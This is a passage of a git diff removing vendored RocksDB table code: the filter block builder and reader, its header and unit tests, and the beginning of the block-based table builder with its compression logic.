-  char cspace = ' ';
-  std::string value_str("");
-  size_t i = 0;
-  const size_t dataLength = 64;
-  const size_t tabLength = 2;
-  const size_t offLength = 16;
-
-  value_str.append(&value[i], std::min(size_t(dataLength), value.size()));
-  i += dataLength;
-  while (i < value.size()) {
-    value_str.append("\n");
-    value_str.append(offLength, cspace);
-    value_str.append(&value[i], std::min(size_t(dataLength), value.size() - i));
-    i += dataLength;
-  }
-
-  std::string result("");
-  if (key.size() < (offLength - tabLength))
-    result.append(size_t((offLength - tabLength)) - key.size(), cspace);
-  result.append(key);
-
-  props->append(result + ": " + value_str + "\n");
-}
-
-template <class TKey>
-void AppendItem(std::string* props, const TKey& key, const std::string& value) {
-  std::string key_str = rocksdb::ToString(key);
-  AppendItem(props, key_str, value);
-}
-}  // namespace
-
-
-// See doc/table_format.txt for an explanation of the filter block format.
-
-// Generate new filter every 2KB of data
-static const size_t kFilterBaseLg = 11;
-static const size_t kFilterBase = 1 << kFilterBaseLg;
-
-BlockBasedFilterBlockBuilder::BlockBasedFilterBlockBuilder(
-    const SliceTransform* prefix_extractor,
-    const BlockBasedTableOptions& table_opt)
-    : policy_(table_opt.filter_policy.get()),
-      prefix_extractor_(prefix_extractor),
-      whole_key_filtering_(table_opt.whole_key_filtering),
-      prev_prefix_start_(0),
-      prev_prefix_size_(0) {
-  assert(policy_);
-}
-
-void BlockBasedFilterBlockBuilder::StartBlock(uint64_t block_offset) {
-  uint64_t filter_index = (block_offset / kFilterBase);
-  assert(filter_index >= filter_offsets_.size());
-  while (filter_index > filter_offsets_.size()) {
-    GenerateFilter();
-  }
-}
-
-void BlockBasedFilterBlockBuilder::Add(const Slice& key) {
-  if (prefix_extractor_ && prefix_extractor_->InDomain(key)) {
-    AddPrefix(key);
-  }
-
-  if (whole_key_filtering_) {
-    AddKey(key);
-  }
-}
-
-// Add key to filter if needed
-inline void BlockBasedFilterBlockBuilder::AddKey(const Slice& key) {
-  start_.push_back(entries_.size());
-  entries_.append(key.data(), key.size());
-}
-
-// Add prefix to filter if needed
-inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) {
-  // get slice for most recently added entry
-  Slice prev;
-  if (prev_prefix_size_ > 0) {
-    prev = Slice(entries_.data() + prev_prefix_start_, prev_prefix_size_);
-  }
-
-  Slice prefix = prefix_extractor_->Transform(key);
-  // insert prefix only when it's different from the previous prefix.
-  if (prev.size() == 0 || prefix != prev) {
-    start_.push_back(entries_.size());
-    prev_prefix_start_ = entries_.size();
-    prev_prefix_size_ = prefix.size();
-    entries_.append(prefix.data(), prefix.size());
-  }
-}
-
-Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp,
-                                           Status* status) {
-  // In this impl we ignore BlockHandle
-  *status = Status::OK();
-  if (!start_.empty()) {
-    GenerateFilter();
-  }
-
-  // Append array of per-filter offsets
-  const uint32_t array_offset = static_cast<uint32_t>(result_.size());
-  for (size_t i = 0; i < filter_offsets_.size(); i++) {
-    PutFixed32(&result_, filter_offsets_[i]);
-  }
-
-  PutFixed32(&result_, array_offset);
-  result_.push_back(kFilterBaseLg);  // Save encoding parameter in result
-  return Slice(result_);
-}
-
-void BlockBasedFilterBlockBuilder::GenerateFilter() {
-  const size_t num_entries = start_.size();
-  if (num_entries == 0) {
-    // Fast path if there are no keys for this filter
-    filter_offsets_.push_back(static_cast<uint32_t>(result_.size()));
-    return;
-  }
-
-  // Make list of keys from flattened key structure
-  start_.push_back(entries_.size());  // Simplify length computation
-  tmp_entries_.resize(num_entries);
-  for (size_t i = 0; i < num_entries; i++) {
-    const char* base = entries_.data() + start_[i];
-    size_t length = start_[i + 1] - start_[i];
-    tmp_entries_[i] = Slice(base, length);
-  }
-
-  // Generate filter for current set of keys and append to result_.
-  filter_offsets_.push_back(static_cast<uint32_t>(result_.size()));
-  policy_->CreateFilter(&tmp_entries_[0], static_cast<int>(num_entries),
-                        &result_);
-
-  tmp_entries_.clear();
-  entries_.clear();
-  start_.clear();
-  prev_prefix_start_ = 0;
-  prev_prefix_size_ = 0;
-}
-
-BlockBasedFilterBlockReader::BlockBasedFilterBlockReader(
-    const SliceTransform* prefix_extractor,
-    const BlockBasedTableOptions& table_opt, bool _whole_key_filtering,
-    BlockContents&& contents, Statistics* stats)
-    : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering),
-      policy_(table_opt.filter_policy.get()),
-      prefix_extractor_(prefix_extractor),
-      data_(nullptr),
-      offset_(nullptr),
-      num_(0),
-      base_lg_(0),
-      contents_(std::move(contents)) {
-  assert(policy_);
-  size_t n = contents_.data.size();
-  if (n < 5) return;  // 1 byte for base_lg_ and 4 for start of offset array
-  base_lg_ = contents_.data[n - 1];
-  uint32_t last_word = DecodeFixed32(contents_.data.data() + n - 5);
-  if (last_word > n - 5) return;
-  data_ = contents_.data.data();
-  offset_ = data_ + last_word;
-  num_ = (n - 5 - last_word) / 4;
-}
-
-bool BlockBasedFilterBlockReader::KeyMayMatch(
-    const Slice& key, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(block_offset != kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  return MayMatch(key, block_offset);
-}
-
-bool BlockBasedFilterBlockReader::PrefixMayMatch(
-    const Slice& prefix, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(block_offset != kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  return MayMatch(prefix, block_offset);
-}
-
-bool BlockBasedFilterBlockReader::MayMatch(const Slice& entry,
-                                           uint64_t block_offset) {
-  uint64_t index = block_offset >> base_lg_;
-  if (index < num_) {
-    uint32_t start = DecodeFixed32(offset_ + index * 4);
-    uint32_t limit = DecodeFixed32(offset_ + index * 4 + 4);
-    if (start <= limit && limit <= (uint32_t)(offset_ - data_)) {
-      Slice filter = Slice(data_ + start, limit - start);
-      bool const may_match = policy_->KeyMayMatch(entry, filter);
-      if (may_match) {
-        PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-        return true;
-      } else {
-        PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-        return false;
-      }
-    } else if (start == limit) {
-      // Empty filters do not match any entries
-      return false;
-    }
-  }
-  return true;  // Errors are treated as potential matches
-}
-
-size_t BlockBasedFilterBlockReader::ApproximateMemoryUsage() const {
-  return num_ * 4 + 5 + (offset_ - data_);
-}
-
-std::string BlockBasedFilterBlockReader::ToString() const {
-  std::string result, filter_meta;
-  result.reserve(1024);
-
-  std::string s_bo("Block offset"), s_hd("Hex dump"), s_fb("# filter blocks");
-  AppendItem(&result, s_fb, rocksdb::ToString(num_));
-  AppendItem(&result, s_bo, s_hd);
-
-  for (size_t index = 0; index < num_; index++) {
-    uint32_t start = DecodeFixed32(offset_ + index * 4);
-    uint32_t limit = DecodeFixed32(offset_ + index * 4 + 4);
-
-    if (start != limit) {
-      result.append(" filter block # " + rocksdb::ToString(index + 1) + "\n");
-      Slice filter = Slice(data_ + start, limit - start);
-      AppendItem(&result, start, filter.ToString(true));
-    }
-  }
-  return result;
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block.h b/thirdparty/rocksdb/table/block_based_filter_block.h
deleted file mode 100644
index 52b79fe..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block.h
+++ /dev/null
@@ -1,112 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A filter block is stored near the end of a Table file.  It contains
-// filters (e.g., bloom filters) for all data blocks in the table combined
-// into a single filter block.
-
-#pragma once
-
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <memory>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/filter_block.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-
-// A BlockBasedFilterBlockBuilder is used to construct all of the filters for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-//
-// The sequence of calls to BlockBasedFilterBlockBuilder must match the regexp:
-//      (StartBlock Add*)* Finish
-class BlockBasedFilterBlockBuilder : public FilterBlockBuilder {
- public:
-  BlockBasedFilterBlockBuilder(const SliceTransform* prefix_extractor,
-      const BlockBasedTableOptions& table_opt);
-
-  virtual bool IsBlockBased() override { return true; }
-  virtual void StartBlock(uint64_t block_offset) override;
-  virtual void Add(const Slice& key) override;
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) override;
-  using FilterBlockBuilder::Finish;
-
- private:
-  void AddKey(const Slice& key);
-  void AddPrefix(const Slice& key);
-  void GenerateFilter();
-
-  // important: all of these might point to invalid addresses
-  // at the time of destruction of this filter block. destructor
-  // should NOT dereference them.
-  const FilterPolicy* policy_;
-  const SliceTransform* prefix_extractor_;
-  bool whole_key_filtering_;
-
-  size_t prev_prefix_start_;        // the position of the last appended prefix
-                                    // to "entries_".
-  size_t prev_prefix_size_;         // the length of the last appended prefix to
-                                    // "entries_".
-  std::string entries_;             // Flattened entry contents
-  std::vector<size_t> start_;       // Starting index in entries_ of each entry
-  std::string result_;              // Filter data computed so far
-  std::vector<Slice> tmp_entries_;  // policy_->CreateFilter() argument
-  std::vector<uint32_t> filter_offsets_;
-
-  // No copying allowed
-  BlockBasedFilterBlockBuilder(const BlockBasedFilterBlockBuilder&);
-  void operator=(const BlockBasedFilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-class BlockBasedFilterBlockReader : public FilterBlockReader {
- public:
-  // REQUIRES: "contents" and *policy must stay live while *this is live.
-  BlockBasedFilterBlockReader(const SliceTransform* prefix_extractor,
-                              const BlockBasedTableOptions& table_opt,
-                              bool whole_key_filtering,
-                              BlockContents&& contents, Statistics* statistics);
-  virtual bool IsBlockBased() override { return true; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
-  // convert this object to a human readable form
-  std::string ToString() const override;
-
- private:
-  const FilterPolicy* policy_;
-  const SliceTransform* prefix_extractor_;
-  const char* data_;    // Pointer to filter data (at block-start)
-  const char* offset_;  // Pointer to beginning of offset array (at block-end)
-  size_t num_;          // Number of entries in offset array
-  size_t base_lg_;      // Encoding parameter (see kFilterBaseLg in .cc file)
-  BlockContents contents_;
-
-  bool MayMatch(const Slice& entry, uint64_t block_offset);
-
-  // No copying allowed
-  BlockBasedFilterBlockReader(const BlockBasedFilterBlockReader&);
-  void operator=(const BlockBasedFilterBlockReader&);
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block_test.cc b/thirdparty/rocksdb/table/block_based_filter_block_test.cc
deleted file mode 100644
index f666ba2..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block_test.cc
+++ /dev/null
@@ -1,248 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_filter_block.h"
-
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// For testing: emit an array with one hash value per key
-class TestHashFilter : public FilterPolicy {
- public:
-  virtual const char* Name() const override { return "TestHashFilter"; }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    for (int i = 0; i < n; i++) {
-      uint32_t h = Hash(keys[i].data(), keys[i].size(), 1);
-      PutFixed32(dst, h);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    uint32_t h = Hash(key.data(), key.size(), 1);
-    for (unsigned int i = 0; i + 4 <= filter.size(); i += 4) {
-      if (h == DecodeFixed32(filter.data() + i)) {
-        return true;
-      }
-    }
-    return false;
-  }
-};
-
-class FilterBlockTest : public testing::Test {
- public:
-  TestHashFilter policy_;
-  BlockBasedTableOptions table_options_;
-
-  FilterBlockTest() {
-    table_options_.filter_policy.reset(new TestHashFilter());
-  }
-};
-
-TEST_F(FilterBlockTest, EmptyBuilder) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  ASSERT_EQ("\\x00\\x00\\x00\\x00\\x0b", EscapeString(block.data));
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100000));
-}
-
-TEST_F(FilterBlockTest, SingleChunk) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-  builder.StartBlock(100);
-  builder.Add("foo");
-  builder.Add("bar");
-  builder.Add("box");
-  builder.StartBlock(200);
-  builder.Add("box");
-  builder.StartBlock(300);
-  builder.Add("hello");
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("bar", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("box", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("hello", 100));
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 100));
-  ASSERT_TRUE(!reader.KeyMayMatch("missing", 100));
-  ASSERT_TRUE(!reader.KeyMayMatch("other", 100));
-}
-
-TEST_F(FilterBlockTest, MultiChunk) {
-  BlockBasedFilterBlockBuilder builder(nullptr, table_options_);
-
-  // First filter
-  builder.StartBlock(0);
-  builder.Add("foo");
-  builder.StartBlock(2000);
-  builder.Add("bar");
-
-  // Second filter
-  builder.StartBlock(3100);
-  builder.Add("box");
-
-  // Third filter is empty
-
-  // Last filter
-  builder.StartBlock(9000);
-  builder.Add("box");
-  builder.Add("hello");
-
-  BlockContents block(builder.Finish(), false, kNoCompression);
-  BlockBasedFilterBlockReader reader(nullptr, table_options_, true,
-                                     std::move(block), nullptr);
-
-  // Check first filter
-  ASSERT_TRUE(reader.KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader.KeyMayMatch("bar", 2000));
-  ASSERT_TRUE(!reader.KeyMayMatch("box", 0));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 0));
-
-  // Check second filter
-  ASSERT_TRUE(reader.KeyMayMatch("box", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 3100));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 3100));
-
-  // Check third filter (empty)
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("box", 4100));
-  ASSERT_TRUE(!reader.KeyMayMatch("hello", 4100));
-
-  // Check last filter
-  ASSERT_TRUE(reader.KeyMayMatch("box", 9000));
-  ASSERT_TRUE(reader.KeyMayMatch("hello", 9000));
-  ASSERT_TRUE(!reader.KeyMayMatch("foo", 9000));
-  ASSERT_TRUE(!reader.KeyMayMatch("bar", 9000));
-}
-
-// Test for block based filter block
-// use new interface in FilterPolicy to create filter builder/reader
-class BlockBasedFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  BlockBasedFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10));
-  }
-
-  ~BlockBasedFilterBlockTest() {}
-};
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedEmptyBuilder) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  ASSERT_EQ("\\x00\\x00\\x00\\x00\\x0b", EscapeString(block.data));
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100000));
-
-  delete builder;
-  delete reader;
-}
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedSingleChunk) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-  builder->StartBlock(100);
-  builder->Add("foo");
-  builder->Add("bar");
-  builder->Add("box");
-  builder->StartBlock(200);
-  builder->Add("box");
-  builder->StartBlock(300);
-  builder->Add("hello");
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("bar", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("box", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("hello", 100));
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 100));
-  ASSERT_TRUE(!reader->KeyMayMatch("missing", 100));
-  ASSERT_TRUE(!reader->KeyMayMatch("other", 100));
-
-  delete builder;
-  delete reader;
-}
-
-TEST_F(BlockBasedFilterBlockTest, BlockBasedMultiChunk) {
-  FilterBlockBuilder* builder = new BlockBasedFilterBlockBuilder(
-      nullptr, table_options_);
-
-  // First filter
-  builder->StartBlock(0);
-  builder->Add("foo");
-  builder->StartBlock(2000);
-  builder->Add("bar");
-
-  // Second filter
-  builder->StartBlock(3100);
-  builder->Add("box");
-
-  // Third filter is empty
-
-  // Last filter
-  builder->StartBlock(9000);
-  builder->Add("box");
-  builder->Add("hello");
-
-  BlockContents block(builder->Finish(), false, kNoCompression);
-  FilterBlockReader* reader = new BlockBasedFilterBlockReader(
-      nullptr, table_options_, true, std::move(block), nullptr);
-
-  // Check first filter
-  ASSERT_TRUE(reader->KeyMayMatch("foo", 0));
-  ASSERT_TRUE(reader->KeyMayMatch("bar", 2000));
-  ASSERT_TRUE(!reader->KeyMayMatch("box", 0));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 0));
-
-  // Check second filter
-  ASSERT_TRUE(reader->KeyMayMatch("box", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 3100));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 3100));
-
-  // Check third filter (empty)
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("box", 4100));
-  ASSERT_TRUE(!reader->KeyMayMatch("hello", 4100));
-
-  // Check last filter
-  ASSERT_TRUE(reader->KeyMayMatch("box", 9000));
-  ASSERT_TRUE(reader->KeyMayMatch("hello", 9000));
-  ASSERT_TRUE(!reader->KeyMayMatch("foo", 9000));
-  ASSERT_TRUE(!reader->KeyMayMatch("bar", 9000));
-
-  delete builder;
-  delete reader;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/block_based_table_builder.cc b/thirdparty/rocksdb/table/block_based_table_builder.cc
deleted file mode 100644
index e82f91a..0000000
--- a/thirdparty/rocksdb/table/block_based_table_builder.cc
+++ /dev/null
@@ -1,870 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_table_builder.h"
-
-#include <assert.h>
-#include <stdio.h>
-
-#include <list>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <utility>
-
-#include "db/dbformat.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/table.h"
-
-#include "table/block.h"
-#include "table/block_based_filter_block.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_based_table_reader.h"
-#include "table/block_builder.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/full_filter_block.h"
-#include "table/meta_blocks.h"
-#include "table/table_builder.h"
-
-#include "util/string_util.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/stop_watch.h"
-#include "util/xxhash.h"
-
-#include "table/index_builder.h"
-#include "table/partitioned_filter_block.h"
-
-namespace rocksdb {
-
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-
-typedef BlockBasedTableOptions::IndexType IndexType;
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-
-// Create a filter block builder based on its type.
-FilterBlockBuilder* CreateFilterBlockBuilder(
-    const ImmutableCFOptions& opt, const BlockBasedTableOptions& table_opt,
-    PartitionedIndexBuilder* const p_index_builder) {
-  if (table_opt.filter_policy == nullptr) return nullptr;
-
-  FilterBitsBuilder* filter_bits_builder =
-      table_opt.filter_policy->GetFilterBitsBuilder();
-  if (filter_bits_builder == nullptr) {
-    return new BlockBasedFilterBlockBuilder(opt.prefix_extractor, table_opt);
-  } else {
-    if (table_opt.partition_filters) {
-      assert(p_index_builder != nullptr);
-      // Since after partition cut request from filter builder it takes time
-      // until index builder actully cuts the partition, we take the lower bound
-      // as partition size.
-      assert(table_opt.block_size_deviation <= 100);
-      auto partition_size = static_cast<uint32_t>(
-          table_opt.metadata_block_size *
-          (100 - table_opt.block_size_deviation));
-      partition_size = std::max(partition_size, static_cast<uint32_t>(1));
-      return new PartitionedFilterBlockBuilder(
-          opt.prefix_extractor, table_opt.whole_key_filtering,
-          filter_bits_builder, table_opt.index_block_restart_interval,
-          p_index_builder, partition_size);
-    } else {
-      return new FullFilterBlockBuilder(opt.prefix_extractor,
-                                        table_opt.whole_key_filtering,
-                                        filter_bits_builder);
-    }
-  }
-}
-
-bool GoodCompressionRatio(size_t compressed_size, size_t raw_size) {
-  // Check to see if compressed less than 12.5%
-  return compressed_size < raw_size - (raw_size / 8u);
-}
-
-}  // namespace
-
-// format_version is the block format as defined in include/rocksdb/table.h
-Slice CompressBlock(const Slice& raw,
-                    const CompressionOptions& compression_options,
-                    CompressionType* type, uint32_t format_version,
-                    const Slice& compression_dict,
-                    std::string* compressed_output) {
-  if (*type == kNoCompression) {
-    return raw;
-  }
-
-  // Will return compressed block contents if (1) the compression method is
-  // supported in this platform and (2) the compression rate is "good enough".
-  switch (*type) {
-    case kSnappyCompression:
-      if (Snappy_Compress(compression_options, raw.data(), raw.size(),
-                          compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kZlibCompression:
-      if (Zlib_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kZlibCompression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kBZip2Compression:
-      if (BZip2_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kBZip2Compression, format_version),
-              raw.data(), raw.size(), compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kLZ4Compression:
-      if (LZ4_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kLZ4Compression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;  // fall back to no compression.
-    case kLZ4HCCompression:
-      if (LZ4HC_Compress(
-              compression_options,
-              GetCompressFormatForVersion(kLZ4HCCompression, format_version),
-              raw.data(), raw.size(), compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;     // fall back to no compression.
-    case kXpressCompression:
-      if (XPRESS_Compress(raw.data(), raw.size(),
-          compressed_output) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      if (ZSTD_Compress(compression_options, raw.data(), raw.size(),
-                        compressed_output, compression_dict) &&
-          GoodCompressionRatio(compressed_output->size(), raw.size())) {
-        return *compressed_output;
-      }
-      break;     // fall back to no compression.
-    default: {}  // Do not recognize this compression type
-  }
-
-  // Compression method is not supported, or not good compression ratio, so just
-  // fall back to uncompressed form.
-  *type = kNoCompression;
-  return raw;
-}
-
-// kBlockBasedTableMagicNumber was picked by running
-//    echo rocksdb.table.block_based | sha1sum
-// and taking the leading 64 bits.
-// Please note that kBlockBasedTableMagicNumber may also be accessed by other
-// .cc files
-// for that reason we declare it extern in the header but to get the space
-// allocated
-// it must be not extern in one place.
-const uint64_t kBlockBasedTableMagicNumber = 0x88e241b785f4cff7ull;
-// We also support reading and writing legacy block based table format (for
-// backwards compatibility)
-const uint64_t kLegacyBlockBasedTableMagicNumber = 0xdb4775248b80fb57ull;
-
-// A collector that collects properties of interest to block-based table.
-// For now this class looks heavy-weight since we only write one additional
-// property.
-// But in the foreseeable future, we will add more and more properties that are
-// specific to block-based table.
-class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector
-    : public IntTblPropCollector {
- public:
-  explicit BlockBasedTablePropertiesCollector(
-      BlockBasedTableOptions::IndexType index_type, bool whole_key_filtering,
-      bool prefix_filtering)
-      : index_type_(index_type),
-        whole_key_filtering_(whole_key_filtering),
-        prefix_filtering_(prefix_filtering) {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override {
-    // Intentionally left blank. Have no interest in collecting stats for
-    // individual key/value pairs.
-    return Status::OK();
-  }
-
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    std::string val;
-    PutFixed32(&val, static_cast<uint32_t>(index_type_));
-    properties->insert({BlockBasedTablePropertyNames::kIndexType, val});
-    properties->insert({BlockBasedTablePropertyNames::kWholeKeyFiltering,
-                        whole_key_filtering_ ? kPropTrue : kPropFalse});
-    properties->insert({BlockBasedTablePropertyNames::kPrefixFiltering,
-                        prefix_filtering_ ? kPropTrue : kPropFalse});
-    return Status::OK();
-  }
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const override {
-    return "BlockBasedTablePropertiesCollector";
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    // Intentionally left blank.
-    return UserCollectedProperties();
-  }
-
- private:
-  BlockBasedTableOptions::IndexType index_type_;
-  bool whole_key_filtering_;
-  bool prefix_filtering_;
-};
-
-struct BlockBasedTableBuilder::Rep {
-  const ImmutableCFOptions ioptions;
-  const BlockBasedTableOptions table_options;
-  const InternalKeyComparator& internal_comparator;
-  WritableFileWriter* file;
-  uint64_t offset = 0;
-  Status status;
-  BlockBuilder data_block;
-  BlockBuilder range_del_block;
-
-  InternalKeySliceTransform internal_prefix_transform;
-  std::unique_ptr<IndexBuilder> index_builder;
-  PartitionedIndexBuilder* p_index_builder_ = nullptr;
-
-  std::string last_key;
-  const CompressionType compression_type;
-  const CompressionOptions compression_opts;
-  // Data for presetting the compression library's dictionary, or nullptr.
-  const std::string* compression_dict;
-  TableProperties props;
-
-  bool closed = false;  // Either Finish() or Abandon() has been called.
-  std::unique_ptr<FilterBlockBuilder> filter_builder;
-  char compressed_cache_key_prefix[BlockBasedTable::kMaxCacheKeyPrefixSize];
-  size_t compressed_cache_key_prefix_size;
-
-  BlockHandle pending_handle;  // Handle to add to index block
-
-  std::string compressed_output;
-  std::unique_ptr<FlushBlockPolicy> flush_block_policy;
-  uint32_t column_family_id;
-  const std::string& column_family_name;
-  uint64_t creation_time = 0;
-  uint64_t oldest_key_time = 0;
-
-  std::vector<std::unique_ptr<IntTblPropCollector>> table_properties_collectors;
-
-  Rep(const ImmutableCFOptions& _ioptions,
-      const BlockBasedTableOptions& table_opt,
-      const InternalKeyComparator& icomparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t _column_family_id, WritableFileWriter* f,
-      const CompressionType _compression_type,
-      const CompressionOptions& _compression_opts,
-      const std::string* _compression_dict, const bool skip_filters,
-      const std::string& _column_family_name, const uint64_t _creation_time,
-      const uint64_t _oldest_key_time)
-      : ioptions(_ioptions),
-        table_options(table_opt),
-        internal_comparator(icomparator),
-        file(f),
